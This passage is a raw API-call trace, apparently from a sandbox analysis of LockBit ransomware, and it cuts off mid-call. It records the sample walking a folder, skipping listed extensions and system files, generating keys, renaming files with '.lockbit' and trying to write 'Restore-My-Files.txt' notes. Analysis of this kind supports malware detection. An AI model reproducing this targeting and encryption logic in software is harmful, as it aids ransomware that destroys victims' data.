ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.922] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.922] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.922] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.924] free (_Block=0x1fa2ed8) [0146.924] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0156537.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.924] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.924] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.924] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f99890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xb66e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0157167.WMF", cAlternateFileName="")) returned 1 [0146.924] lstrcmpiW (lpString1=".", lpString2="J0157167.WMF") returned -1 [0146.924] lstrcmpiW (lpString1="..", lpString2="J0157167.WMF") returned -1 [0146.924] PathFindExtensionW (pszPath="J0157167.WMF") returned=".WMF" [0146.924] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.924] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.924] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.924] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.924] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.924] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.924] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.924] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.924] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.924] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.924] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.925] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.925] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.926] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.926] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.926] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.926] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.926] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.926] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.926] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.926] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.926] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.926] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.926] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.926] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.926] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.926] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0157167.WMF") returned 1 [0146.926] lstrcmpiW (lpString1="ntldr", lpString2="J0157167.WMF") returned 1 [0146.926] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0157167.WMF") returned 1 [0146.926] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0157167.WMF") returned -1 [0146.926] lstrcmpiW (lpString1="autorun.inf", lpString2="J0157167.WMF") returned -1 [0146.926] lstrcmpiW (lpString1="thumbs.db", lpString2="J0157167.WMF") returned 1 [0146.926] lstrcmpiW (lpString1="iconcache.db", lpString2="J0157167.WMF") returned -1 [0146.926] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.926] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF") returned=".WMF" [0146.927] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.927] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.927] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.927] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.927] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.927] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.927] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.927] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.928] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.928] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF.lockbit") returned 72 [0146.928] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157167.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0146.933] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.933] malloc (_Size=0x40068) returned 0x1ff1e60 [0146.933] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=46702) returned 1 [0146.933] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.933] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0146.933] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.934] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0146.934] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.936] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.936] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.936] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.937] free (_Block=0x1fa2ed8) [0146.937] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157167.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.938] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.938] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.938] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f99890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x54d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0157177.WMF", cAlternateFileName="")) returned 1 [0146.938] lstrcmpiW (lpString1=".", lpString2="J0157177.WMF") returned -1 [0146.938] lstrcmpiW (lpString1="..", lpString2="J0157177.WMF") returned -1 [0146.938] PathFindExtensionW (pszPath="J0157177.WMF") returned=".WMF" [0146.938] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.938] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.938] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.938] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.938] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.938] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.938] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.938] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.938] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.938] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.938] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.938] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.938] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.938] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.939] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.939] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.940] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.940] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.940] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.940] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.940] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.940] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.940] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.940] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.940] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.940] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.940] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.940] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.940] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0157177.WMF") returned 1 [0146.940] lstrcmpiW (lpString1="ntldr", lpString2="J0157177.WMF") returned 1 [0146.940] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0157177.WMF") returned 1 [0146.940] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0157177.WMF") returned -1 [0146.940] lstrcmpiW (lpString1="autorun.inf", lpString2="J0157177.WMF") returned -1 [0146.940] lstrcmpiW (lpString1="thumbs.db", lpString2="J0157177.WMF") returned 1 [0146.940] lstrcmpiW (lpString1="iconcache.db", lpString2="J0157177.WMF") returned -1 [0146.940] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0146.940] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF") returned=".WMF" [0146.940] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0146.941] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0146.941] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0146.942] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0146.942] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0146.942] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0146.942] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0146.942] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF.lockbit") returned 72 [0146.942] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0157177.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0146.943] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0146.943] malloc (_Size=0x40068) returned 0x3d70450 [0146.943] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=21716) returned 1 [0146.943] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.943] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0146.944] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.944] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.944] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0146.944] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0146.949] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.949] malloc (_Size=0xa6) returned 0x1fa2ed8 [0146.949] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0146.950] free (_Block=0x1fa2ed8) [0146.950] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0157177.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0146.951] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0146.951] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0146.951] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f99890, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x45f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0157191.WMF", cAlternateFileName="")) returned 1 [0146.951] lstrcmpiW (lpString1=".", lpString2="J0157191.WMF") returned -1 [0146.951] lstrcmpiW (lpString1="..", lpString2="J0157191.WMF") returned -1 [0146.951] PathFindExtensionW (pszPath="J0157191.WMF") returned=".WMF" [0146.951] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0146.951] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0146.951] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0146.951] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0146.951] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0146.951] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0146.951] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0146.951] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0146.951] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0146.951] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0146.951] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0146.951] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0146.951] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0146.952] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0146.952] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0146.953] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0146.953] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0146.953] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0146.953] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0146.953] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0146.953] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0146.953] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0146.953] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0146.953] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0146.953] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0146.953] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0146.953] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0146.953] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0157191.WMF") returned 1 [0146.953] lstrcmpiW (lpString1="ntldr", lpString2="J0157191.WMF") returned 1 [0146.953] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0157191.WMF") returned 1 [0146.953] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0157191.WMF") returned -1 [0146.953] lstrcmpiW (lpString1="autorun.inf", lpString2="J0157191.WMF") returned -1 [0146.953] lstrcmpiW (lpString1="thumbs.db", lpString2="J0157191.WMF") returned 1 [0146.953] lstrcmpiW (lpString1="iconcache.db", lpString2="J0157191.WMF") returned -1 [0146.953] PathAddBackslashW (in: 